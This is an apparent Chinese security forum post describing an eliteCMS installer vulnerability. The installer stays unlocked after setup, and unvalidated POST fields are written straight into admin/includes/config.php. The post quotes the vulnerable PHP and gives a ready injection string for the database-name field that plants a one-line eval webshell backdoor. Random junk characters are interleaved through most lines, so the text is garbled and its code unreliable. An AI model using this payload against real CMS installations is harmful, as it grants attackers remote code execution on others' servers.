eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装4 {$ w, G# ]+ P$ q7 i4 g
+ `' Z7 ~0 B0 w: e- d另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php" F+ `% \6 Q* P$ Z) B
我们来看代码:
- S: u. ~; U' w# n l ' p. m: r0 G1 ` B m
.... k" c9 `' f" Q5 d2 G2 W, S/ v* h
elseif ($_GET['step'] == "4") {
% n% C0 B( n2 p. K# L3 I0 V# P $file = "../admin/includes/config.php";; m# c5 t5 f/ C
$write = "<?php\n";
" E! E' e6 ?: b- a3 X' b $write .= "/**\n";2 c2 C" y+ a2 }2 Q
$write .= "*\n";+ Q, G& E {$ e5 u5 {7 X4 n
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
, ~$ G" p8 |# U+ @7 m$ ?...略...
: T4 W% y/ s- d5 b+ B1 S $write .= "*\n";. _) K0 U: } ]- D4 f2 r# `' w5 I
$write .= "*/\n";# {, ^" E$ G+ A; [$ U6 J& K
$write .= "\n";
, v# \" ]9 z4 t8 D; h) F- O5 z $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
0 t2 O6 K6 b' D' c4 r $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
, Q6 c' J" Y9 D8 Q $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
9 `; }: ?8 Y5 l* ^3 X& J. N0 V $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";+ ?" n) Q0 f7 e5 ]
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
+ Z5 I1 [' c6 E8 U: c2 T $write .= "if (!\$connection) {\n";
* u: n4 [; X( Z1 r $write .= " die(\"Database connection failed\" .mysql_error());\n";
, {* ~* n3 r1 k% l; ^. d $write .= " \n";/ x, @1 t4 o" b
$write .= "} \n";
7 V% I, q# u& l1 d. z $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";& @3 G; `6 j9 Y; Y( P+ c8 G% C4 U
$write .= "if (!\$db_select) {\n";
( u g. F+ t" ?) t. V9 _# { n $write .= " die(\"Database select failed\" .mysql_error());\n";
+ }* ?6 D4 H2 y; N) r $write .= " \n";6 R6 U& u1 g/ E
$write .= "} \n";
# r* S9 N7 M7 V+ g V* U0 A( e $write .= "?>\n";" r7 n/ j2 Z) K2 r, G3 _
8 k% o4 T- q1 f# o! a" Z9 D
$writer = fopen($file, 'w');
3 f3 U8 S: h5 O...
& y! V6 J- u9 I+ K# D# ]
, _: e8 K4 V# @( M. o, _* ^9 H在看代码:
7 e8 _# k6 p- q( Y# b# ^8 A w6 ^* N7 z" s0 G
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
0 _. O r$ c/ ?# Q$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
3 R# a' c( [$ _) ~: x2 l- E8 X6 w m# |$_SESSION['DB_USER'] = $_POST['DB_USER'];, E) J. H% J& d9 i4 t$ o& W$ G
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
9 J0 j( d9 Z/ _3 ^, z $ d7 z1 k# L( }! p8 p' D" q& Y
取值未作任何验证/ x! B6 _7 ~* I8 k8 P: v
如果将数据库名POST数据:
1 i! c5 S% F7 S! J' f' d; h
3 d7 ^ c, u) g"?><?php eval($_POST[c]);?><?php
# P! t/ e- p& [3 \$ K; \
) V$ e6 a# t! O, l将导致一句话后门写入/admin/includes/config.php
0 H- C" E( y1 ?; |1 @1 W |
发表于 2012-11-18 13:59:27
收藏
支持
反对